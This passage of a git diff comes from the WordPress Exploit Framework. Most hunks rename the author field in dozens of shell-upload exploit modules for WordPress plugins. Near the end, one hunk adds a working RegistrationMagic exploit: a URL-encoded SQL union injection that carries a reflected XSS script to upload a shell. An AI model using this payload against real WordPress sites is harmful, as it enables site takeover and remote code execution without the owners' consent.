-        'Sipke Mellema',                  # Disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Sipke Mellema', # Disclosure
+        'rastating'      # WPXF module
       ],
       references: [
         ['WPVDB', '8674'],
diff --git a/modules/exploits/instalinker_reflected_xss_shell_upload.rb b/modules/exploits/instalinker_reflected_xss_shell_upload.rb
index a74cd9c..8aa06c4 100644
--- a/modules/exploits/instalinker_reflected_xss_shell_upload.rb
+++ b/modules/exploits/instalinker_reflected_xss_shell_upload.rb
@@ -9,7 +9,7 @@ def initialize
     update_info(
       name: 'Instalinker <= 1.1.1 Reflected XSS Shell Upload',
       author: [
-        'Rob Carr <rob[at]rastating.com>' # Disclosure + WPXF module
+        'rastating'  # Disclosure + WPXF module
       ],
       references: [
         ['WPVDB', '8382'],
diff --git a/modules/exploits/ithemes_security_stored_xss_shell_upload.rb b/modules/exploits/ithemes_security_stored_xss_shell_upload.rb
index 9278c98..2e3b209 100644
--- a/modules/exploits/ithemes_security_stored_xss_shell_upload.rb
+++ b/modules/exploits/ithemes_security_stored_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'iThemes Security <= 5.6.1 Unauthenticated Stored XSS Shell Upload',
       author: [
-        'Slavco Mihajloski',              # Disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Slavco Mihajloski', # Disclosure
+        'rastating'          # WPXF module
       ],
       references: [
         ['WPVDB', '8635'],
diff --git a/modules/exploits/job_manager_reflected_xss_shell_upload.rb b/modules/exploits/job_manager_reflected_xss_shell_upload.rb
index 2749e04..c8d1968 100644
--- a/modules/exploits/job_manager_reflected_xss_shell_upload.rb
+++ b/modules/exploits/job_manager_reflected_xss_shell_upload.rb
@@ -17,8 +17,8 @@ def initialize
             'a new admin user which will be used to upload and execute the '\
             'selected payload in the context of the web server.',
       author: [
-        'Marcin Probola',                 # Discovery and disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Marcin Probola', # Discovery and disclosure
+        'rastating'       # WPXF module
       ],
       references: [
         ['WPVDB', '8313'],
diff --git a/modules/exploits/leenkme_reflected_xss_shell_upload.rb b/modules/exploits/leenkme_reflected_xss_shell_upload.rb
index 9fdc5d2..be20699 100644
--- a/modules/exploits/leenkme_reflected_xss_shell_upload.rb
+++ b/modules/exploits/leenkme_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'leenk.me <= 2.5.0 Reflected XSS Shell Upload',
       author: [
-        'Shravan Kumar',                  # Disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Shravan Kumar', # Disclosure
+        'rastating'      # WPXF module
       ],
       references: [
         ['WPVDB', '8457'],
diff --git a/modules/exploits/lightbox_reflected_xss_shell_upload.rb b/modules/exploits/lightbox_reflected_xss_shell_upload.rb
index 189562b..d15a034 100644
--- a/modules/exploits/lightbox_reflected_xss_shell_upload.rb
+++ b/modules/exploits/lightbox_reflected_xss_shell_upload.rb
@@ -9,7 +9,7 @@ def initialize
     update_info(
       name: 'Lightbox <= 1.6.6 Reflected XSS Shell Upload',
       author: [
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'rastating'  # WPXF module
       ],
       references: [
         ['WPVDB', '8662'],
diff --git a/modules/exploits/link_library_reflected_xss_shell_upload.rb b/modules/exploits/link_library_reflected_xss_shell_upload.rb
index ba5cb87..37fed99 100644
--- a/modules/exploits/link_library_reflected_xss_shell_upload.rb
+++ b/modules/exploits/link_library_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Link Library <= 5.9.12.29 Reflected XSS Shell Upload',
       author: [
-        'Burak Kelebek',                  # Disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Burak Kelebek', # Disclosure
+        'rastating'      # WPXF module
       ],
       references: [
         ['WPVDB', '8604'],
diff --git a/modules/exploits/magic_fields_reflected_xss_shell_upload.rb b/modules/exploits/magic_fields_reflected_xss_shell_upload.rb
index 8e76d03..1d5893d 100644
--- a/modules/exploits/magic_fields_reflected_xss_shell_upload.rb
+++ b/modules/exploits/magic_fields_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Magic Fields <= 1.7.1 Reflected XSS Shell Upload',
       author: [
-        'Burak Kelebek',                  # Discovery
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Burak Kelebek', # Discovery
+        'rastating'      # WPXF module
       ],
       references: [
         ['WPVDB', '8756'],
diff --git a/modules/exploits/mailchimp_for_wp_reflected_xss_shell_upload.rb b/modules/exploits/mailchimp_for_wp_reflected_xss_shell_upload.rb
index 4875da0..511a9d3 100644
--- a/modules/exploits/mailchimp_for_wp_reflected_xss_shell_upload.rb
+++ b/modules/exploits/mailchimp_for_wp_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'MailChimp for WordPress <= 4.0.10 Reflected XSS Shell Upload',
       author: [
-        'Tom Adams',                      # Discovery and disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Tom Adams', # Discovery and disclosure
+        'rastating'  # WPXF module
       ],
       references: [
         ['WPVDB', '8695']
diff --git a/modules/exploits/mailcwp_authenticated_shell_upload.rb b/modules/exploits/mailcwp_authenticated_shell_upload.rb
index 50a1f1e..a820a5f 100644
--- a/modules/exploits/mailcwp_authenticated_shell_upload.rb
+++ b/modules/exploits/mailcwp_authenticated_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'MailCWP v1.100 Authenticated Shell Upload',
       author: [
-        'Larry W. Cashdollar',            # Discovery and disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Larry W. Cashdollar', # Discovery and disclosure
+        'rastating'            # WPXF module
       ],
       references: [
         ['WPVDB', '8090'],
diff --git a/modules/exploits/mailcwp_unauthenticated_shell_upload.rb b/modules/exploits/mailcwp_unauthenticated_shell_upload.rb
index 74bd477..a8867d8 100644
--- a/modules/exploits/mailcwp_unauthenticated_shell_upload.rb
+++ b/modules/exploits/mailcwp_unauthenticated_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'MailCWP <= v1.99 Unauthenticated Shell Upload',
       author: [
-        'Larry W. Cashdollar',            # Discovery and disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Larry W. Cashdollar', # Discovery and disclosure
+        'rastating'            # WPXF module
       ],
       references: [
         ['WPVDB', '8090'],
diff --git a/modules/exploits/mailpoet_newsletters_reflected_xss_shell_upload.rb b/modules/exploits/mailpoet_newsletters_reflected_xss_shell_upload.rb
index 50e27e9..20faa46 100644
--- a/modules/exploits/mailpoet_newsletters_reflected_xss_shell_upload.rb
+++ b/modules/exploits/mailpoet_newsletters_reflected_xss_shell_upload.rb
@@ -13,8 +13,8 @@ def initialize
             'a new admin user which will be used to upload and execute the '\
             'selected payload in the context of the web server.',
       author: [
-        'Netsparker',                     # Discovery and disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Netsparker', # Discovery and disclosure
+        'rastating'   # WPXF module
       ],
       references: [
         ['WPVDB', '8373'],
diff --git a/modules/exploits/mailpoet_newsletters_shell_upload.rb b/modules/exploits/mailpoet_newsletters_shell_upload.rb
index ebd5106..854e4cf 100644
--- a/modules/exploits/mailpoet_newsletters_shell_upload.rb
+++ b/modules/exploits/mailpoet_newsletters_shell_upload.rb
@@ -13,8 +13,8 @@ def initialize
             'allows unauthenticated users to upload and execute PHP scripts '\
             'in the context of the web server.',
       author: [
-        'Marc-Alexandre Montpas',         # Vulnerability discovery
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Marc-Alexandre Montpas', # Vulnerability discovery
+        'rastating'               # WPXF module
       ],
       references: [
         ['URL', 'http://blog.sucuri.net/2014/07/remote-file-upload-vulnerability-on-mailpoet-wysija-newsletters.html'],
diff --git a/modules/exploits/mailpoet_newsletters_v272_reflected_xss_shell_upload.rb b/modules/exploits/mailpoet_newsletters_v272_reflected_xss_shell_upload.rb
index db28361..fd4701a 100644
--- a/modules/exploits/mailpoet_newsletters_v272_reflected_xss_shell_upload.rb
+++ b/modules/exploits/mailpoet_newsletters_v272_reflected_xss_shell_upload.rb
@@ -11,8 +11,8 @@ def initialize
     update_info(
       name: 'MailPoet Newsletters <= 2.7.2 Reflected XSS Shell Upload',
       author: [
-        'Sipke Mellema,',                 # Discovery and disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Sipke Mellema,', # Discovery and disclosure
+        'rastating'       # WPXF module
       ],
       references: [
         ['WPVDB', '8617'],
diff --git a/modules/exploits/master_slider_reflected_xss_shell_upload.rb b/modules/exploits/master_slider_reflected_xss_shell_upload.rb
index 0db1952..e933947 100644
--- a/modules/exploits/master_slider_reflected_xss_shell_upload.rb
+++ b/modules/exploits/master_slider_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Master Slider <= 2.7.1 Reflected XSS Shell Upload',
       author: [
-        'Yorick Koster',                  # Disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Yorick Koster', # Disclosure
+        'rastating'      # WPXF module
       ],
       references: [
         ['WPVDB', '8548'],
diff --git a/modules/exploits/maxbuttons_reflected_xss_shell_upload.rb b/modules/exploits/maxbuttons_reflected_xss_shell_upload.rb
index 3003eb9..9fd6a8d 100644
--- a/modules/exploits/maxbuttons_reflected_xss_shell_upload.rb
+++ b/modules/exploits/maxbuttons_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'MaxButtons <= 6.18 Reflected XSS Shell Upload',
       author: [
-        'JPCert',                         # Disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'JPCert',    # Disclosure
+        'rastating'  # WPXF module
       ],
       references: [
         ['CVE', '2017-2169'],
diff --git a/modules/exploits/mdc_private_message_xss_shell_upload.rb b/modules/exploits/mdc_private_message_xss_shell_upload.rb
index 7a59fe8..ec8e812 100644
--- a/modules/exploits/mdc_private_message_xss_shell_upload.rb
+++ b/modules/exploits/mdc_private_message_xss_shell_upload.rb
@@ -18,8 +18,8 @@ def initialize
             'execute the payload in the context of the web server once an '\
             'admin reads the message containing the stored script.',
       author: [
-        'Chris Kellum',                   # Vulnerability discovery
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Chris Kellum', # Vulnerability discovery
+        'rastating'     # WPXF module
       ],
       references: [
         ['CVE', '2015-6805'],
diff --git a/modules/exploits/micro_theme_shell_upload.rb b/modules/exploits/micro_theme_shell_upload.rb
index f6579e3..51830de 100644
--- a/modules/exploits/micro_theme_shell_upload.rb
+++ b/modules/exploits/micro_theme_shell_upload.rb
@@ -17,8 +17,8 @@ def initialize
             'subsequently execute PHP scripts in the context of the '\
             'web server.',
       author: [
-        'Divya',                          # Vulnerability disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Divya',     # Vulnerability disclosure
+        'rastating'  # WPXF module
       ],
       references: [
         ['EDB', '36611']
diff --git a/modules/exploits/minimax_page_layout_builder_reflected_xss_shell_upload.rb b/modules/exploits/minimax_page_layout_builder_reflected_xss_shell_upload.rb
index 090c872..0c78f41 100644
--- a/modules/exploits/minimax_page_layout_builder_reflected_xss_shell_upload.rb
+++ b/modules/exploits/minimax_page_layout_builder_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'MiniMax Page Layout Builder <= 2.0.2 Reflected XSS Shell Upload',
       author: [
-        'Larry W. Cashdollar',            # Discovery
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Larry W. Cashdollar', # Discovery
+        'rastating'            # WPXF module
       ],
       references: [
         ['WPVDB', '8446'],
diff --git a/modules/exploits/mobile_app_builder_shell_upload.rb b/modules/exploits/mobile_app_builder_shell_upload.rb
index e789693..ea422b2 100644
--- a/modules/exploits/mobile_app_builder_shell_upload.rb
+++ b/modules/exploits/mobile_app_builder_shell_upload.rb
@@ -7,8 +7,8 @@ def initialize
     update_info(
       name: 'Mobile App Builder <= 1.05 Unauthenticated Shell Upload',
       author: [
-        'Larry W. Cashdollar',            # Discovery and disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Larry W. Cashdollar', # Discovery and disclosure
+        'rastating'            # WPXF module
       ],
       references: [
         ['WPVDB', '8772'],
diff --git a/modules/exploits/mobile_app_native_v3_shell_upload.rb b/modules/exploits/mobile_app_native_v3_shell_upload.rb
index 61af6b4..dce89ef 100644
--- a/modules/exploits/mobile_app_native_v3_shell_upload.rb
+++ b/modules/exploits/mobile_app_native_v3_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Mobile App Native <= 3.0 Unauthenticated Shell Upload',
       author: [
-        'Larry W. Cashdollar',            # Discovery and disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Larry W. Cashdollar', # Discovery and disclosure
+        'rastating'            # WPXF module
       ],
       references: [
         ['WPVDB', '8743'],
diff --git a/modules/exploits/mobile_friendly_app_builder_shell_upload.rb b/modules/exploits/mobile_friendly_app_builder_shell_upload.rb
index 94c1241..5e06e2b 100644
--- a/modules/exploits/mobile_friendly_app_builder_shell_upload.rb
+++ b/modules/exploits/mobile_friendly_app_builder_shell_upload.rb
@@ -7,8 +7,8 @@ def initialize
     update_info(
       name: 'Mobile Friendly App Builder <= 3.0 Unauthenticated Shell Upload',
       author: [
-        'Larry W. Cashdollar',            # Discovery and disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Larry W. Cashdollar', # Discovery and disclosure
+        'rastating'            # WPXF module
       ],
       references: [
         ['WPVDB', '8771'],
diff --git a/modules/exploits/msmc_redirect_after_comment_reflected_xss_shell_upload.rb b/modules/exploits/msmc_redirect_after_comment_reflected_xss_shell_upload.rb
index e005168..75ca11b 100644
--- a/modules/exploits/msmc_redirect_after_comment_reflected_xss_shell_upload.rb
+++ b/modules/exploits/msmc_redirect_after_comment_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'MSMC - Redirect After Comment Reflected XSS Shell Upload',
       author: [
-        'Tom Adams',                      # Discovery
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Tom Adams', # Discovery
+        'rastating'  # WPXF module
       ],
       references: [
         ['WPVDB', '8809'],
diff --git a/modules/exploits/n_media_website_contact_form_shell_upload.rb b/modules/exploits/n_media_website_contact_form_shell_upload.rb
index cbac6d9..0560a1c 100644
--- a/modules/exploits/n_media_website_contact_form_shell_upload.rb
+++ b/modules/exploits/n_media_website_contact_form_shell_upload.rb
@@ -13,8 +13,8 @@ def initialize
             'allows unauthenticated users to upload and execute PHP scripts '\
             'in the context of the web server.',
       author: [
-        'Claudio Viviani',                # Vulnerability discovery
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Claudio Viviani', # Vulnerability discovery
+        'rastating'        # WPXF module
       ],
       references: [
         ['URL', 'http://www.homelab.it/index.php/2015/04/12/wordpress-n-media-website-contact-form-shell-upload/'],
diff --git a/modules/exploits/n_media_website_contact_form_v1.9_shell_upload.rb b/modules/exploits/n_media_website_contact_form_v1.9_shell_upload.rb
index 79350cc..317f7b1 100644
--- a/modules/exploits/n_media_website_contact_form_v1.9_shell_upload.rb
+++ b/modules/exploits/n_media_website_contact_form_v1.9_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'N-Media Website Contact Form >= 1.9 Shell Upload',
       author: [
-        'White Fir Design',               # Vulnerability discovery
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'White Fir Design', # Vulnerability discovery
+        'rastating'         # WPXF module
       ],
       references: [
         ['URL', 'https://www.pluginvulnerabilities.com/2016/09/19/arbitrary-file-upload-vulnerability-in-n-media-website-contact-form-with-file-upload/'],
diff --git a/modules/exploits/neosense_shell_upload.rb b/modules/exploits/neosense_shell_upload.rb
index 5b66380..dc43dff 100644
--- a/modules/exploits/neosense_shell_upload.rb
+++ b/modules/exploits/neosense_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Neosense Theme <= 1.7 Unauthenticated Shell Upload',
       author: [
-        'Walter Hop',                     # Discovery and disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Walter Hop', # Discovery and disclosure
+        'rastating'   # WPXF module
       ],
       references: [
         ['WPVDB', '8622'],
diff --git a/modules/exploits/new_year_firework_reflected_xss_shell_upload.rb b/modules/exploits/new_year_firework_reflected_xss_shell_upload.rb
index 8de2e62..22e6c8e 100644
--- a/modules/exploits/new_year_firework_reflected_xss_shell_upload.rb
+++ b/modules/exploits/new_year_firework_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'New Year Firework <= 1.1.9 Reflected XSS Shell Upload',
       author: [
-        'Larry W. Cashdollar',            # Discovery
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Larry W. Cashdollar', # Discovery
+        'rastating'            # WPXF module
       ],
       references: [
         ['WPVDB', '8451'],
diff --git a/modules/exploits/newsletter_by_supsystic_csrf_stored_xss_shell_upload.rb b/modules/exploits/newsletter_by_supsystic_csrf_stored_xss_shell_upload.rb
index 37ae0c5..69a81a8 100644
--- a/modules/exploits/newsletter_by_supsystic_csrf_stored_xss_shell_upload.rb
+++ b/modules/exploits/newsletter_by_supsystic_csrf_stored_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Newsletter by Supsystic < 1.1.8 CSRF Stored XSS Shell Upload',
       author: [
-        'King Coder',                     # Disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'King Coder', # Disclosure
+        'rastating'   # WPXF module
       ],
       references: [
         ['WPVDB', '8832'],
diff --git a/modules/exploits/ninja_forms_reflected_xss_shell_upload.rb b/modules/exploits/ninja_forms_reflected_xss_shell_upload.rb
index 4718f7b..c71e2cb 100644
--- a/modules/exploits/ninja_forms_reflected_xss_shell_upload.rb
+++ b/modules/exploits/ninja_forms_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Ninja Forms <= 2.9.51 Reflected XSS Shell Upload',
       author: [
-        'Han Sahin',                      # Discovery
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Han Sahin', # Discovery
+        'rastating'  # WPXF module
       ],
       references: [
         ['WPVDB', '8560'],
diff --git a/modules/exploits/ninja_forms_unauthenticated_shell_upload.rb b/modules/exploits/ninja_forms_unauthenticated_shell_upload.rb
index e57c48b..61857bf 100644
--- a/modules/exploits/ninja_forms_unauthenticated_shell_upload.rb
+++ b/modules/exploits/ninja_forms_unauthenticated_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Ninja Forms 2.9.36 to 2.9.42 Unauthenticated Shell Upload',
       author: [
-        'James Golovich',                 # Discovery and disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'James Golovich', # Discovery and disclosure
+        'rastating'       # WPXF module
       ],
       references: [
         ['CVE', '2016-1209'],
diff --git a/modules/exploits/no_external_links_reflected_xss_shell_upload.rb b/modules/exploits/no_external_links_reflected_xss_shell_upload.rb
index 70a309b..eed45d0 100644
--- a/modules/exploits/no_external_links_reflected_xss_shell_upload.rb
+++ b/modules/exploits/no_external_links_reflected_xss_shell_upload.rb
@@ -10,8 +10,8 @@ def initialize
     update_info(
       name: 'WP No External Links <= 3.5.18 Reflected XSS Shell Upload',
       author: [
-        'DefenseCode',                    # Discovery
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'DefenseCode', # Discovery
+        'rastating'    # WPXF module
       ],
       references: [
         ['WPVDB', '8840'],
diff --git a/modules/exploits/ocim_mp3_reflected_xss_shell_upload.rb b/modules/exploits/ocim_mp3_reflected_xss_shell_upload.rb
index bccc6dc..64b6d28 100644
--- a/modules/exploits/ocim_mp3_reflected_xss_shell_upload.rb
+++ b/modules/exploits/ocim_mp3_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Ocim MP3 Reflected XSS Shell Upload',
       author: [
-        'Soufiane Boussali',              # Discovery
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Soufiane Boussali', # Discovery
+        'rastating'          # WPXF module
       ],
       references: [
         ['WPVDB', '8425']
diff --git a/modules/exploits/peters_login_redirect_reflected_xss_shell_upload.rb b/modules/exploits/peters_login_redirect_reflected_xss_shell_upload.rb
index 7ee9a4a..f5c5bf7 100644
--- a/modules/exploits/peters_login_redirect_reflected_xss_shell_upload.rb
+++ b/modules/exploits/peters_login_redirect_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Peter\'s Login Redirect <= 2.9.0 Reflected XSS Shell Upload',
       author: [
-        'Yorick Koster',                  # Disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Yorick Koster', # Disclosure
+        'rastating'      # WPXF module
       ],
       references: [
         ['WPVDB', '8602'],
diff --git a/modules/exploits/photo_album_plus_xss_shell_upload.rb b/modules/exploits/photo_album_plus_xss_shell_upload.rb
index d010303..7d7c1d5 100644
--- a/modules/exploits/photo_album_plus_xss_shell_upload.rb
+++ b/modules/exploits/photo_album_plus_xss_shell_upload.rb
@@ -23,8 +23,8 @@ def initialize
             'website, when an administrator views images or comments in '\
             'the administrative interface.',
       author: [
-        'High-Tech Bridge Security Research Lab',   # Discovery and disclosure
-        'Rob Carr <rob[at]rastating.com>'           # WPXF module
+        'High-Tech Bridge Security Research Lab', # Discovery and disclosure
+        'rastating'                               # WPXF module
       ],
       references: [
         ['CVE', '2015-3647'],
diff --git a/modules/exploits/photo_gallery_shell_upload.rb b/modules/exploits/photo_gallery_shell_upload.rb
index bff1dad..e2a701f 100644
--- a/modules/exploits/photo_gallery_shell_upload.rb
+++ b/modules/exploits/photo_gallery_shell_upload.rb
@@ -18,8 +18,8 @@ def initialize
             'UploadHandler.php does not properly verify or sanitize '\
             'user-uploaded files.',
       author: [
-        'Kacper Szurek',                  # Vulnerability disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Kacper Szurek', # Vulnerability disclosure
+        'rastating'      # WPXF module
       ],
       references: [
         ['WPVDB', '7769'],
diff --git a/modules/exploits/podlove_podcast_publisher_reflected_xss_shell_upload.rb b/modules/exploits/podlove_podcast_publisher_reflected_xss_shell_upload.rb
index aa690f2..5501b6a 100644
--- a/modules/exploits/podlove_podcast_publisher_reflected_xss_shell_upload.rb
+++ b/modules/exploits/podlove_podcast_publisher_reflected_xss_shell_upload.rb
@@ -9,7 +9,7 @@ def initialize
     update_info(
       name: 'Podlove Podcast Publisher <= 2.3.15 Reflected XSS Shell Upload',
       author: [
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'rastating'  # WPXF module
       ],
       references: [
         ['WPVDB', '8697'],
diff --git a/modules/exploits/pondol_form_to_mail_reflected_xss_shell_upload.rb b/modules/exploits/pondol_form_to_mail_reflected_xss_shell_upload.rb
index 5bf337e..7aa9e71 100644
--- a/modules/exploits/pondol_form_to_mail_reflected_xss_shell_upload.rb
+++ b/modules/exploits/pondol_form_to_mail_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Pondol Form to Mail <= 1.1 Reflected XSS Shell Upload',
       author: [
-        'Larry W. Cashdollar',            # Discovery
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Larry W. Cashdollar', # Discovery
+        'rastating'            # WPXF module
       ],
       references: [
         ['WPVDB', '8460'],
diff --git a/modules/exploits/pootle_button_reflected_xss_shell_upload.rb b/modules/exploits/pootle_button_reflected_xss_shell_upload.rb
index 1a8fe8f..4f92fda 100644
--- a/modules/exploits/pootle_button_reflected_xss_shell_upload.rb
+++ b/modules/exploits/pootle_button_reflected_xss_shell_upload.rb
@@ -7,8 +7,8 @@ def initialize
     update_info(
       name: 'Pootle Button <= 1.1.1 Reflected XSS Shell Upload',
       author: [
-        'Ricardo Sanchez',                        # Disclosure
-        'Paul Williams <phyushin[at]phyubox.com>' # WPXF module
+        'Ricardo Sanchez',                         # Disclosure
+        'Paul Williams <phyushin[at]phyubox.com>'  # WPXF module
       ],
       references: [
         ['WPVDB', '8930'],
diff --git a/modules/exploits/popup_maker_reflected_xss_shell_upload.rb b/modules/exploits/popup_maker_reflected_xss_shell_upload.rb
index a1353e1..41abdfa 100644
--- a/modules/exploits/popup_maker_reflected_xss_shell_upload.rb
+++ b/modules/exploits/popup_maker_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Popup Maker <= 1.6.4 Reflected XSS Shell Upload',
       author: [
-        'Chris Liu',                      # Discovery
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Chris Liu', # Discovery
+        'rastating'  # WPXF module
       ],
       references: [
         ['WPVDB', '8878'],
diff --git a/modules/exploits/portfolio_reflected_xss_shell_upload.rb b/modules/exploits/portfolio_reflected_xss_shell_upload.rb
index 1c4a2b1..629cfba 100644
--- a/modules/exploits/portfolio_reflected_xss_shell_upload.rb
+++ b/modules/exploits/portfolio_reflected_xss_shell_upload.rb
@@ -9,7 +9,7 @@ def initialize
     update_info(
       name: 'Portfolio <= 2.1.10 Reflected XSS Shell Upload',
       author: [
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'rastating'  # WPXF module
       ],
       references: [
         ['WPVDB', '8637'],
diff --git a/modules/exploits/profile_builder_reflected_xss_shell_upload.rb b/modules/exploits/profile_builder_reflected_xss_shell_upload.rb
index f0e1801..fd8a3cd 100644
--- a/modules/exploits/profile_builder_reflected_xss_shell_upload.rb
+++ b/modules/exploits/profile_builder_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Profile Builder <= 2.4.0 Reflected XSS Shell Upload',
       author: [
-        'Yorick Koster',                  # Disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Yorick Koster', # Disclosure
+        'rastating'      # WPXF module
       ],
       references: [
         ['WPVDB', '8547'],
diff --git a/modules/exploits/quiz_and_survey_master_reflected_xss_shell_upload.rb b/modules/exploits/quiz_and_survey_master_reflected_xss_shell_upload.rb
index 4a272f3..71b4e73 100644
--- a/modules/exploits/quiz_and_survey_master_reflected_xss_shell_upload.rb
+++ b/modules/exploits/quiz_and_survey_master_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Quiz And Survey Master <= 4.7.8 Reflected XSS Shell Upload',
       author: [
-        'Tom Adams',                      # Disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Tom Adams', # Disclosure
+        'rastating'  # WPXF module
       ],
       references: [
         ['WPVDB', '8698'],
diff --git a/modules/exploits/quotes_collection_reflected_xss_shell_upload.rb b/modules/exploits/quotes_collection_reflected_xss_shell_upload.rb
index c71ecd0..d3e10ea 100644
--- a/modules/exploits/quotes_collection_reflected_xss_shell_upload.rb
+++ b/modules/exploits/quotes_collection_reflected_xss_shell_upload.rb
@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Quotes Collection <= 2.0.5 Reflected XSS Shell Upload',
       author: [
-        'Yorick Koster',                  # Disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Yorick Koster', # Disclosure
+        'rastating'      # WPXF module
       ],
       references: [
         ['WPVDB', '8649'],
diff --git a/modules/exploits/reflex_gallery_shell_upload.rb b/modules/exploits/reflex_gallery_shell_upload.rb
index c80c96b..68e24e8 100644
--- a/modules/exploits/reflex_gallery_shell_upload.rb
+++ b/modules/exploits/reflex_gallery_shell_upload.rb
@@ -15,7 +15,7 @@ def initialize
       author: [
         'Sammy Forgit',
         'CrashBandicot',
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'rastating'
       ],
       references: [
         ['EDB', '36374'],
diff --git a/modules/exploits/registrationmagic_reflected_xss_shell_upload.rb b/modules/exploits/registrationmagic_reflected_xss_shell_upload.rb
new file mode 100644
index 0000000..f476536
--- /dev/null
+++ b/modules/exploits/registrationmagic_reflected_xss_shell_upload.rb
@@ -0,0 +1,38 @@
+# frozen_string_literal: true
+
+class Wpxf::Exploit::RegistrationMagicReflectedXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::ReflectedXss
+  include ERB::Util
+
+  def initialize
+    super
+
+    update_info(
+      name: 'RegistrationMagic - Custom Registration Forms <= 3.7.9.2 Reflected XSS Shell Upload',
+      author: [
+        'rastating'  # Disclosure + WPXF module
+      ],
+      references: [
+        ['WPVDB', '8976'],
+        ['URL', 'https://www.rastating.com/registrationmagic-custom-registration-forms-3-7-9-2-reflected-xss']
+      ],
+      date: 'Dec 10 2017'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('custom-registration-form-builder-with-submission-manager', '3.7.9.3')
+  end
+
+  def vulnerable_url
+    normalize_uri(wordpress_url_admin, 'admin.php')
+  end
+
+  def url_payload
+    url_encode("-#{Utility::Text.rand_numeric(2)} union select 0,0,0,'<script>#{xss_ascii_encoded_include_script}</script>',concat(0x54,0x65,0x78,0x74,0x62,0x6f,0x78),0,0,0,0,0,0")
+  end
+
+  def url_with_xss
+    "#{vulnerable_url}?page=rm_field_manage&rm_form_id=#{url_payload}"
+  end
+end
diff --git a/modules/exploits/responsive_lightbox_reflected_xss_shell_upload.rb b/modules/exploits/responsive_lightbox_reflected_xss_shell_upload.rb
index 2eb3bc6..c2a035f 100644
--- a/modules/exploits/responsive_lightbox_reflected_xss_shell_upload.rb
